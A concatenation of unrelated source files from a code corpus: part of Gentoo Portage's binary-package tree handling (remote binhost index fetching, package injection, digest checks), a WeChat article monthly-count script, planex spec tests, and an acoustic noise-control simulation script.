if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
for cpv in list(metadata):
if cpv not in pkg_paths:
del metadata[cpv]
# Do not bother to write the Packages index if $PKGDIR/All/ exists
# since it will provide no benefit due to the need to read CATEGORY
# from xpak.
if update_pkgindex and os.access(self.pkgdir, os.W_OK):
del pkgindex.packages[:]
pkgindex.packages.extend(iter(metadata.values()))
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
if getbinpkgs and not self.settings["PORTAGE_BINHOST"]:
writemsg(_("!!! PORTAGE_BINHOST unset, but use is requested.\n"),
noiselevel=-1)
if not getbinpkgs or 'PORTAGE_BINHOST' not in self.settings:
self.populated=1
return
self._remotepkgs = {}
for base_url in self.settings["PORTAGE_BINHOST"].split():
parsed_url = urlparse(base_url)
host = parsed_url.netloc
port = parsed_url.port
user = None
passwd = None
user_passwd = ""
if "@" in host:
user, host = host.split("@", 1)
user_passwd = user + "@"
if ":" in user:
user, passwd = user.split(":", 1)
port_args = []
if port is not None:
port_str = ":%s" % (port,)
if host.endswith(port_str):
host = host[:-len(port_str)]
pkgindex_file = os.path.join(self.settings["EROOT"], CACHE_PATH, "binhost",
host, parsed_url.path.lstrip("/"), "Packages")
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
try:
pkgindex.read(f)
finally:
f.close()
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
local_timestamp = pkgindex.header.get("TIMESTAMP", None)
remote_timestamp = None
rmt_idx = self._new_pkgindex()
proc = None
tmp_filename = None
try:
# urlparse.urljoin() only works correctly with recognized
# protocols and requires the base url to have a trailing
# slash, so join manually...
url = base_url.rstrip("/") + "/Packages"
try:
f = _urlopen(url, if_modified_since=local_timestamp)
if hasattr(f, 'headers') and f.headers.get('timestamp', ''):
remote_timestamp = f.headers.get('timestamp')
except IOError as err:
if hasattr(err, 'code') and err.code == 304: # not modified (since local_timestamp)
raise UseCachedCopyOfRemoteIndex()
path = parsed_url.path.rstrip("/") + "/Packages"
if parsed_url.scheme == 'sftp':
# The sftp command complains about 'Illegal seek' if
# we try to make it write to /dev/stdout, so use a
# temp file instead.
fd, tmp_filename = tempfile.mkstemp()
os.close(fd)
if port is not None:
port_args = ['-P', "%s" % (port,)]
proc = subprocess.Popen(['sftp'] + port_args + \
[user_passwd + host + ":" + path, tmp_filename])
if proc.wait() != os.EX_OK:
raise
f = open(tmp_filename, 'rb')
elif parsed_url.scheme == 'ssh':
if port is not None:
port_args = ['-p', "%s" % (port,)]
proc = subprocess.Popen(['ssh'] + port_args + \
[user_passwd + host, '--', 'cat', path],
stdout=subprocess.PIPE)
f = proc.stdout
else:
setting = 'FETCHCOMMAND_' + parsed_url.scheme.upper()
fcmd = self.settings.get(setting)
if not fcmd:
raise
fd, tmp_filename = tempfile.mkstemp()
tmp_dirname, tmp_basename = os.path.split(tmp_filename)
os.close(fd)
success = portage.getbinpkg.file_get(url,
tmp_dirname, fcmd=fcmd, filename=tmp_basename)
if not success:
raise EnvironmentError("%s failed" % (setting,))
f = open(tmp_filename, 'rb')
f_dec = codecs.iterdecode(f,
_encodings['repo.content'], errors='replace')
try:
rmt_idx.readHeader(f_dec)
if not remote_timestamp: # in case it had not been read from HTTP header
remote_timestamp = rmt_idx.header.get("TIMESTAMP", None)
if not remote_timestamp:
# no timestamp in the header, something's wrong
pkgindex = None
writemsg(_("\n\n!!! Binhost package index " \
" has no TIMESTAMP field.\n"), noiselevel=-1)
else:
if not self._pkgindex_version_supported(rmt_idx):
writemsg(_("\n\n!!! Binhost package index version" \
" is not supported: '%s'\n") % \
rmt_idx.header.get("VERSION"), noiselevel=-1)
pkgindex = None
elif local_timestamp != remote_timestamp:
rmt_idx.readBody(f_dec)
pkgindex = rmt_idx
finally:
# Timeout after 5 seconds, in case close() blocks
# indefinitely (see bug #350139).
try:
try:
AlarmSignal.register(5)
f.close()
finally:
AlarmSignal.unregister()
except AlarmSignal:
writemsg("\n\n!!! %s\n" % \
_("Timed out while closing connection to binhost"),
noiselevel=-1)
except UseCachedCopyOfRemoteIndex:
writemsg_stdout("\n")
writemsg_stdout(
colorize("GOOD", _("Local copy of remote index is up-to-date and will be used.")) + \
"\n")
rmt_idx = pkgindex
except EnvironmentError as e:
writemsg(_("\n\n!!! Error fetching binhost package" \
" info from '%s'\n") % _hide_url_passwd(base_url))
writemsg("!!! %s\n\n" % str(e))
del e
pkgindex = None
if proc is not None:
if proc.poll() is None:
proc.kill()
proc.wait()
proc = None
if tmp_filename is not None:
try:
os.unlink(tmp_filename)
except OSError:
pass
if pkgindex is rmt_idx:
pkgindex.modified = False # don't update the header
try:
ensure_dirs(os.path.dirname(pkgindex_file))
f = atomic_ofstream(pkgindex_file)
pkgindex.write(f)
f.close()
except (IOError, PortageException):
if os.access(os.path.dirname(pkgindex_file), os.W_OK):
raise
# The current user doesn't have permission to cache the
# file, but that's alright.
if pkgindex:
# Organize remote package list as a cpv -> metadata map.
remotepkgs = _pkgindex_cpv_map_latest_build(pkgindex)
remote_base_uri = pkgindex.header.get("URI", base_url)
for cpv, remote_metadata in remotepkgs.items():
remote_metadata["BASE_URI"] = remote_base_uri
self._pkgindex_uri[cpv] = url
self._remotepkgs.update(remotepkgs)
self._remote_has_index = True
for cpv in remotepkgs:
self.dbapi.cpv_inject(cpv)
if True:
# Remote package instances override local package
# if they are not identical.
hash_names = ["SIZE"] + self._pkgindex_hashes
for cpv, local_metadata in metadata.items():
remote_metadata = self._remotepkgs.get(cpv)
if remote_metadata is None:
continue
# Use digests to compare identity.
identical = True
for hash_name in hash_names:
local_value = local_metadata.get(hash_name)
if local_value is None:
continue
remote_value = remote_metadata.get(hash_name)
if remote_value is None:
continue
if local_value != remote_value:
identical = False
break
if identical:
del self._remotepkgs[cpv]
else:
# Override the local package in the aux_get cache.
self.dbapi._aux_cache[cpv] = remote_metadata
else:
# Local package instances override remote instances.
for cpv in metadata:
self._remotepkgs.pop(cpv, None)
self.populated=1
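	# A minimal configuration sketch for the remote branch above (hypothetical
	# URIs): PORTAGE_BINHOST is split on whitespace and each entry is fetched
	# as <base>/Packages, e.g. in make.conf:
	#
	#     PORTAGE_BINHOST="http://binhost.example.org/packages ftp://mirror.example.net/pkgs"
	#
	# the fetched remote metadata is then merged into self._remotepkgs.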
def inject(self, cpv, filename=None):
"""Add a freshly built package to the database. This updates
$PKGDIR/Packages with the new package metadata (including MD5).
@param cpv: The cpv of the new package to inject
@type cpv: string
@param filename: File path of the package to inject, or None if it's
already in the location returned by getname()
@type filename: string
@rtype: None
"""
mycat, mypkg = catsplit(cpv)
if not self.populated:
self.populate()
if filename is None:
full_path = self.getname(cpv)
else:
full_path = filename
try:
s = os.stat(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
writemsg(_("!!! Binary package does not exist: '%s'\n") % full_path,
noiselevel=-1)
return
mytbz2 = portage.xpak.tbz2(full_path)
slot = mytbz2.getfile("SLOT")
if slot is None:
writemsg(_("!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
return
slot = slot.strip()
self.dbapi.cpv_inject(cpv)
# Reread the Packages index (in case it's been changed by another
		# process) and then update it, all while holding a lock.
pkgindex_lock = None
created_symlink = False
try:
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
if filename is not None:
new_filename = self.getname(cpv)
try:
samefile = os.path.samefile(filename, new_filename)
except OSError:
samefile = False
if not samefile:
self._ensure_dir(os.path.dirname(new_filename))
_movefile(filename, new_filename, mysettings=self.settings)
if self._all_directory and \
self.getname(cpv).split(os.path.sep)[-2] == "All":
self._create_symlink(cpv)
created_symlink = True
pkgindex = self._load_pkgindex()
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
# Discard remote metadata to ensure that _pkgindex_entry
# gets the local metadata. This also updates state for future
# isremote calls.
if self._remotepkgs is not None:
self._remotepkgs.pop(cpv, None)
# Discard cached metadata to ensure that _pkgindex_entry
# doesn't return stale metadata.
self.dbapi._aux_cache.pop(cpv, None)
try:
d = self._pkgindex_entry(cpv)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(cpv), noiselevel=-1)
self.dbapi.cpv_remove(cpv)
del self._pkg_paths[cpv]
return
# If found, remove package(s) with duplicate path.
path = d.get("PATH", "")
for i in range(len(pkgindex.packages) - 1, -1, -1):
d2 = pkgindex.packages[i]
if path and path == d2.get("PATH"):
# Handle path collisions in $PKGDIR/All
# when CPV is not identical.
del pkgindex.packages[i]
elif cpv == d2.get("CPV"):
if path == d2.get("PATH", ""):
del pkgindex.packages[i]
elif created_symlink and not d2.get("PATH", ""):
# Delete entry for the package that was just
# overwritten by a symlink to this package.
del pkgindex.packages[i]
pkgindex.packages.append(d)
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
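	# A minimal usage sketch for inject() (hypothetical cpv, path and bintree
	# instance name):
	#
	#     bintree.inject("app-misc/foo-1.0")  # package already at its getname() location
	#     bintree.inject("app-misc/foo-1.0", filename="/var/tmp/foo-1.0.tbz2")  # moved into PKGDIR first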
def _pkgindex_write(self, pkgindex):
contents = codecs.getwriter(_encodings['repo.content'])(io.BytesIO())
pkgindex.write(contents)
contents = contents.getvalue()
atime = mtime = long(pkgindex.header["TIMESTAMP"])
output_files = [(atomic_ofstream(self._pkgindex_file, mode="wb"),
self._pkgindex_file, None)]
if "compress-index" in self.settings.features:
gz_fname = self._pkgindex_file + ".gz"
fileobj = atomic_ofstream(gz_fname, mode="wb")
output_files.append((GzipFile(filename='', mode="wb",
fileobj=fileobj, mtime=mtime), gz_fname, fileobj))
for f, fname, f_close in output_files:
f.write(contents)
f.close()
if f_close is not None:
f_close.close()
# some seconds might have elapsed since TIMESTAMP
os.utime(fname, (atime, mtime))
def _pkgindex_entry(self, cpv):
"""
Performs checksums and evaluates USE flag conditionals.
Raises InvalidDependString if necessary.
@rtype: dict
		@return: a dict containing entry for the given cpv.
"""
pkg_path = self.getname(cpv)
d = dict(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(cpv, self._pkgindex_aux_keys)))
d.update(perform_multiple_checksums(
pkg_path, hashes=self._pkgindex_hashes))
d["CPV"] = cpv
st = os.stat(pkg_path)
d["MTIME"] = str(st[stat.ST_MTIME])
d["SIZE"] = str(st.st_size)
rel_path = self._pkg_paths[cpv]
# record location if it's non-default
if rel_path != cpv + ".tbz2":
d["PATH"] = rel_path
self._eval_use_flags(cpv, d)
return d
def _new_pkgindex(self):
return portage.getbinpkg.PackageIndex(
allowed_pkg_keys=self._pkgindex_allowed_pkg_keys,
default_header_data=self._pkgindex_default_header_data,
default_pkg_data=self._pkgindex_default_pkg_data,
inherited_keys=self._pkgindex_inherited_keys,
translated_keys=self._pkgindex_translated_keys)
def _update_pkgindex_header(self, header):
portdir = normalize_path(os.path.realpath(self.settings["PORTDIR"]))
profiles_base = os.path.join(portdir, "profiles") + os.path.sep
if self.settings.profile_path:
profile_path = normalize_path(
os.path.realpath(self.settings.profile_path))
if profile_path.startswith(profiles_base):
profile_path = profile_path[len(profiles_base):]
header["PROFILE"] = profile_path
header["VERSION"] = str(self._pkgindex_version)
base_uri = self.settings.get("PORTAGE_BINHOST_HEADER_URI")
if base_uri:
header["URI"] = base_uri
else:
header.pop("URI", None)
for k in self._pkgindex_header_keys:
v = self.settings.get(k, None)
if v:
header[k] = v
else:
header.pop(k, None)
def _pkgindex_version_supported(self, pkgindex):
version = pkgindex.header.get("VERSION")
if version:
try:
if int(version) <= self._pkgindex_version:
return True
except ValueError:
pass
return False
def _eval_use_flags(self, cpv, metadata):
use = frozenset(metadata["USE"].split())
raw_use = use
iuse = set(f.lstrip("-+") for f in metadata["IUSE"].split())
use = [f for f in use if f in iuse]
use.sort()
metadata["USE"] = " ".join(use)
for k in self._pkgindex_use_evaluated_keys:
if k.endswith('DEPEND'):
token_class = Atom
else:
token_class = None
try:
deps = metadata[k]
deps = use_reduce(deps, uselist=raw_use, token_class=token_class)
deps = paren_enclose(deps)
except portage.exception.InvalidDependString as e:
writemsg("%s: %s\n" % (k, str(e)),
noiselevel=-1)
raise
metadata[k] = deps
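	# A worked example of the evaluation above (hypothetical metadata): given
	#     IUSE="ssl threads", USE="ssl userland_GNU", RDEPEND="ssl? ( dev-libs/openssl )"
	# the stored USE becomes "ssl" (only flags listed in IUSE are kept) and
	# RDEPEND is flattened against the raw USE set to "dev-libs/openssl".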
def exists_specific(self, cpv):
if not self.populated:
self.populate()
return self.dbapi.match(
dep_expand("="+cpv, mydb=self.dbapi, settings=self.settings))
def dep_bestmatch(self, mydep):
"compatibility method -- all matches, not just visible ones"
if not self.populated:
self.populate()
writemsg("\n\n", 1)
writemsg("mydep: %s\n" % mydep, 1)
mydep = dep_expand(mydep, mydb=self.dbapi, settings=self.settings)
writemsg("mydep: %s\n" % mydep, 1)
mykey = dep_getkey(mydep)
writemsg("mykey: %s\n" % mykey, 1)
mymatch = best(match_from_list(mydep,self.dbapi.cp_list(mykey)))
writemsg("mymatch: %s\n" % mymatch, 1)
if mymatch is None:
return ""
return mymatch
def getname(self, pkgname):
"""Returns a file location for this package. The default location is
${PKGDIR}/All/${PF}.tbz2, but will be ${PKGDIR}/${CATEGORY}/${PF}.tbz2
in the rare event of a collision. The prevent_collision() method can
be called to ensure that ${PKGDIR}/All/${PF}.tbz2 is available for a
specific cpv."""
if not self.populated:
self.populate()
mycpv = pkgname
mypath = self._pkg_paths.get(mycpv, None)
if mypath:
return os.path.join(self.pkgdir, mypath)
mycat, mypkg = catsplit(mycpv)
if self._all_directory:
mypath = os.path.join("All", mypkg + ".tbz2")
if mypath in self._pkg_paths.values():
mypath = os.path.join(mycat, mypkg + ".tbz2")
else:
mypath = os.path.join(mycat, mypkg + ".tbz2")
self._pkg_paths[mycpv] = mypath # cache for future lookups
return os.path.join(self.pkgdir, mypath)
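	# A minimal sketch of typical getname() results (hypothetical PKGDIR and
	# cpv, with an "All" directory present):
	#
	#     bintree.getname("app-misc/foo-1.0")
	#     # -> "/usr/portage/packages/All/foo-1.0.tbz2"
	#     # or ".../app-misc/foo-1.0.tbz2" if another category already claims
	#     # All/foo-1.0.tbz2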
def isremote(self, pkgname):
"""Returns true if the package is kept remotely and it has not been
downloaded (or it is only partially downloaded)."""
if self._remotepkgs is None or pkgname not in self._remotepkgs:
return False
# Presence in self._remotepkgs implies that it's remote. When a
# package is downloaded, state is updated by self.inject().
return True
def get_pkgindex_uri(self, pkgname):
"""Returns the URI to the Packages file for a given package."""
return self._pkgindex_uri.get(pkgname)
def gettbz2(self, pkgname):
"""Fetches the package from a remote site, if necessary. Attempts to
resume if the file appears to be partially downloaded."""
tbz2_path = self.getname(pkgname)
tbz2name = os.path.basename(tbz2_path)
resume = False
if os.path.exists(tbz2_path):
if tbz2name[:-5] not in self.invalids:
return
else:
resume = True
writemsg(_("Resuming download of this tbz2, but it is possible that it is corrupt.\n"),
noiselevel=-1)
mydest = os.path.dirname(self.getname(pkgname))
self._ensure_dir(mydest)
# urljoin doesn't work correctly with unrecognized protocols like sftp
if self._remote_has_index:
rel_url = self._remotepkgs[pkgname].get("PATH")
if not rel_url:
rel_url = pkgname+".tbz2"
remote_base_uri = self._remotepkgs[pkgname]["BASE_URI"]
url = remote_base_uri.rstrip("/") + "/" + rel_url.lstrip("/")
else:
url = self.settings["PORTAGE_BINHOST"].rstrip("/") + "/" + tbz2name
protocol = urlparse(url)[0]
fcmd_prefix = "FETCHCOMMAND"
if resume:
fcmd_prefix = "RESUMECOMMAND"
fcmd = self.settings.get(fcmd_prefix + "_" + protocol.upper())
if not fcmd:
fcmd = self.settings.get(fcmd_prefix)
success = portage.getbinpkg.file_get(url, mydest, fcmd=fcmd)
if not success:
try:
os.unlink(self.getname(pkgname))
except OSError:
pass
raise portage.exception.FileNotFound(mydest)
self.inject(pkgname)
def _load_pkgindex(self):
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(self._pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
except EnvironmentError:
pass
else:
try:
pkgindex.read(f)
finally:
f.close()
return pkgindex
def digestCheck(self, pkg):
"""
Verify digests for the given package and raise DigestException
if verification fails.
@rtype: bool
@return: True if digests could be located, False otherwise.
"""
cpv = pkg
if not isinstance(cpv, basestring):
cpv = pkg.cpv
pkg = None
pkg_path = self.getname(cpv)
metadata = None
if self._remotepkgs is None or cpv not in self._remotepkgs:
for d in self._load_pkgindex().packages:
if d["CPV"] == cpv:
metadata = d
break
else:
metadata = self._remotepkgs[cpv]
if metadata is None:
return False
digests = {}
for k in hashfunc_map:
v = metadata.get(k)
if not v:
continue
digests[k] = v
if "SIZE" in metadata:
try:
digests["size"] = int(metadata["SIZE"])
except ValueError:
writemsg(_("!!! Malformed SIZE attribute in remote " \
"metadata for '%s'\n") % cpv)
if not digests:
return False
hash_filter = _hash_filter(
self.settings.get("PORTAGE_CHECKSUM_FILTER", ""))
if not hash_filter.transparent:
digests = _apply_hash_filter(digests, hash_filter)
eout = EOutput()
eout.quiet = self.settings.get("PORTAGE_QUIET") == "1"
ok, st = _check_distfile(pkg_path, digests, eout, show_errors=0)
if not ok:
ok, reason = verify_all(pkg_path, digests)
if not ok:
raise portage.exception.DigestException(
(pkg_path,) + tuple(reason))
return True
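	# A minimal caller sketch for digestCheck() (assumed usage pattern): a
	# False return means no digests could be located, while a verification
	# failure raises DigestException:
	#
	#     try:
	#         verified = bintree.digestCheck(cpv)
	#     except portage.exception.DigestException:
	#         pass  # handle a corrupt or tampered binary package
	#     else:
	#         if not verified:
	#             pass  # nothing to verify against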
def getslot(self, mycatpkg):
"Get a slot for a catpkg; assume it exists."
myslot = ""
try:
myslot = self.dbapi._pkg_str(mycatpkg, None).slot
except KeyError:
pass
return myslot
| gpl-2.0 | -7,462,835,677,793,273,000 | 30.585795 | 91 | 0.652544 | false |
hhj0325/pystock | com/hhj/sogou/countByTime.py | 1 | 1082 |
"""
Select articles published in 2018 and count them by month.
"""
import numpy as np
import pandas as pd
from pyecharts import Bar
df = pd.read_csv('sg_articles.csv', header=None, names=["title", "article", "name", "date"])
list1 = []
list2 = []
for j in df['date']:
    # extract the publication year and month from the article date
time_1 = j.split('-')[0]
time_2 = j.split('-')[1]
list1.append(time_1)
list2.append(time_2)
df['year'] = list1
df['month'] = list2
# select articles published in 2018 and count them by month
df = df.loc[df['year'] == '2018']
month_message = df.groupby(['month'])
month_com = month_message['month'].agg(['count'])
month_com.reset_index(inplace=True)
month_com_last = month_com.sort_index()
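# The same monthly counts could also be produced in one step (a sketch, not
# used below): counts = df['month'].value_counts().sort_index()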
attr = ["{}".format(str(i) + '月') for i in range(1, 12)]
v1 = np.array(month_com_last['count'])
v1 = ["{}".format(int(i)) for i in v1]
bar = Bar("微信文章发布时间分布", title_pos='center', title_top='18', width=800, height=400)
bar.add("", attr, v1, is_stack=True, is_label_show=True)
bar.render("微信文章发布时间分布.html") | apache-2.0 | 4,181,870,580,663,964,700 | 27.333333 | 92 | 0.641328 | false |
simonjbeaumont/planex | tests/test_planex_spec.py | 1 | 6322 |
# Run these tests with 'nosetests':
# install the 'python-nose' package (Fedora/CentOS or Ubuntu)
# run 'nosetests' in the root of the repository
import unittest
import platform
import planex.spec
def get_rpm_machine():
if platform.machine() == 'x86_64':
return 'x86_64'
return 'i386'
def get_deb_machine():
if platform.machine() == 'x86_64':
return 'amd64'
return 'i386'
class RpmTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
self.spec = planex.spec.Spec("tests/data/ocaml-cohttp.spec",
dist=".el6")
def test_good_filename_preprocessor(self):
planex.spec.Spec("tests/data/ocaml-cohttp.spec.in")
def test_bad_filename(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec")
def test_bad_filename_preprocessor(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec.in")
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(
self.spec.provides(),
set(["ocaml-cohttp", "ocaml-cohttp-devel"]))
def test_source_urls(self):
self.assertEqual(
self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/"
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(
self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(
self.spec.buildrequires(),
set(["ocaml", "ocaml-findlib", "ocaml-re-devel",
"ocaml-uri-devel", "ocaml-cstruct-devel",
"ocaml-lwt-devel", "ocaml-ounit-devel",
"ocaml-ocamldoc", "ocaml-camlp4-devel",
"openssl", "openssl-devel"]))
def test_source_package_path(self):
self.assertEqual(
self.spec.source_package_path(),
"./SRPMS/ocaml-cohttp-0.9.8-1.el6.src.rpm")
def test_binary_package_paths(self):
machine = get_rpm_machine()
self.assertEqual(
sorted(self.spec.binary_package_paths()),
[
path.format(machine=machine) for path in
sorted([
"./RPMS/{machine}/ocaml-cohttp-0.9.8-1.el6.{machine}.rpm",
"./RPMS/{machine}/" +
"ocaml-cohttp-devel-0.9.8-1.el6.{machine}.rpm"])
]
)
class DebTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
def map_rpm_to_deb(name):
mapping = {"ocaml-cohttp": ["libcohttp-ocaml"],
"ocaml-cohttp-devel": ["libcohttp-ocaml-dev"],
"ocaml": ["ocaml-nox", "ocaml-native-compilers"],
"ocaml-findlib": ["ocaml-findlib"],
"ocaml-re-devel": ["libre-ocaml-dev"],
"ocaml-uri-devel": ["liburi-ocaml-dev"],
"ocaml-cstruct-devel": ["libcstruct-ocaml-dev"],
"ocaml-lwt-devel": ["liblwt-ocaml-dev"],
"ocaml-ounit-devel": ["libounit-ocaml-dev"],
"ocaml-ocamldoc": ["ocaml-nox"],
"ocaml-camlp4-devel": ["camlp4", "camlp4-extra"],
"openssl": ["libssl1.0.0"],
"openssl-devel": ["libssl-dev"]}
return mapping[name]
self.spec = planex.spec.Spec("./tests/data/ocaml-cohttp.spec",
target="deb",
map_name=map_rpm_to_deb)
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(
self.spec.provides(),
set(["libcohttp-ocaml", "libcohttp-ocaml-dev"]))
def test_source_urls(self):
self.assertEqual(
self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/" +
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(
self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(
self.spec.buildrequires(),
set(["ocaml-nox", "ocaml-native-compilers",
"ocaml-findlib", "libre-ocaml-dev",
"liburi-ocaml-dev", "libcstruct-ocaml-dev",
"liblwt-ocaml-dev", "libounit-ocaml-dev",
"camlp4", "camlp4-extra", "libssl1.0.0",
"libssl-dev"]))
def test_source_package_path(self):
self.assertEqual(
self.spec.source_package_path(),
"./SRPMS/libcohttp-ocaml_0.9.8-1.dsc")
def test_binary_package_paths(self):
machine = get_deb_machine()
self.assertEqual(
sorted(self.spec.binary_package_paths()),
[path.format(machine=machine) for path
in sorted(["./RPMS/libcohttp-ocaml_0.9.8-1_{machine}.deb",
"./RPMS/libcohttp-ocaml-dev_0.9.8-1_{machine}.deb"])])
| lgpl-2.1 | 710,548,437,859,340,000 | 35.543353 | 79 | 0.542708 | false |
szarvas/anc-field | examples/ie224-impulse.py | 1 | 5152 |
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal, stats
import sys
sys.path.append('..')
from anc_field_py.ancfield import *
from anc_field_py.ancutil import *
def add_microphones(ancObject):
# error_mic
ancObject.AddMic([4,1.6,5.3])
# reference_front
ancObject.AddMic([4,1.6,4.5])
# reference_back
ancObject.AddMic([4,1.6,6.5])
# reference_left
ancObject.AddMic([3,1.6,5.5])
# reference_right
ancObject.AddMic([5,1.6,5.5])
# reference_bottom
ancObject.AddMic([4,0.6,5.5])
# reference_top
ancObject.AddMic([4,2.6,5.5])
return ancObject
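# The rows of the simulation output follow the order the microphones are added
# above: y[0] error, y[1] front, y[2] back, y[3] left, y[4] right, y[5] bottom,
# y[6] top (matching the savetxt calls below).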
# =========================================================================
# SIMULATION 1
# Calculating noise to microphone paths
# =========================================================================
#
# Trying to run this simulation on CPU failed on an i7-3770, compiling the
# lrs_1.cl file fails. It may be because the scene's size is too large for
# the CPU. Compiling it for the built-in integrated GPU worked though.
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# noise_source
anc.AddSource([4,1.6,1.0], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_noise) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-noise-to-error.dat', y_noise[0,:])
np.savetxt('ie224-noise-to-reference_front.dat', y_noise[1,:])
np.savetxt('ie224-noise-to-reference_back.dat', y_noise[2,:])
np.savetxt('ie224-noise-to-reference_left.dat', y_noise[3,:])
np.savetxt('ie224-noise-to-reference_right.dat', y_noise[4,:])
np.savetxt('ie224-noise-to-reference_bottom.dat', y_noise[5,:])
np.savetxt('ie224-noise-to-reference_top.dat', y_noise[6,:])
# =========================================================================
# SIMULATION 2
# Calculating actuator to microphone paths
# =========================================================================
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# actuator
anc.AddSource([4,1.6,5.5], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_actuator) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-actuator-to-error.dat', y_actuator[0,:])
np.savetxt('ie224-actuator-to-reference_front.dat', y_actuator[1,:])
np.savetxt('ie224-actuator-to-reference_back.dat', y_actuator[2,:])
np.savetxt('ie224-actuator-to-reference_left.dat', y_actuator[3,:])
np.savetxt('ie224-actuator-to-reference_right.dat', y_actuator[4,:])
np.savetxt('ie224-actuator-to-reference_bottom.dat', y_actuator[5,:])
np.savetxt('ie224-actuator-to-reference_top.dat', y_actuator[6,:])
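# The saved impulse responses can be reloaded later without rerunning the
# simulation (a sketch; file names as written above):
#   h_noise_err = np.loadtxt('ie224-noise-to-error.dat')
#   h_act_err = np.loadtxt('ie224-actuator-to-error.dat')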
# =========================================================================
# GENERATING IMAGES FOR THE REPORT
# Calculating actuator to microphone paths
# =========================================================================
#
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_noise[0,:])
plt.title('ie224-noise-to-error')
fig.savefig('ie224-noise-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_noise[1,:])
plt.title('ie224-noise-to-reference_front')
fig.savefig('ie224-noise-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_noise[2,:])
plt.title('ie224-noise-to-reference_back')
fig.savefig('ie224-noise-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_noise[3,:])
plt.title('ie224-noise-to-reference_left')
fig.savefig('ie224-noise-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_noise[4,:])
plt.title('ie224-noise-to-reference_right')
fig.savefig('ie224-noise-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_noise[5,:])
plt.title('ie224-noise-to-reference_bottom')
fig.savefig('ie224-noise-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_noise[6,:])
plt.title('ie224-noise-to-reference_top')
fig.savefig('ie224-noise-to-reference_top.png')
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_actuator[0,:])
plt.title('ie224-actuator-to-error')
fig.savefig('ie224-actuator-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[1,:])
plt.title('ie224-actuator-to-reference_front')
fig.savefig('ie224-actuator-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[2,:])
plt.title('ie224-actuator-to-reference_back')
fig.savefig('ie224-actuator-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[3,:])
plt.title('ie224-actuator-to-reference_left')
fig.savefig('ie224-actuator-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[4,:])
plt.title('ie224-actuator-to-reference_right')
fig.savefig('ie224-actuator-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[5,:])
plt.title('ie224-actuator-to-reference_bottom')
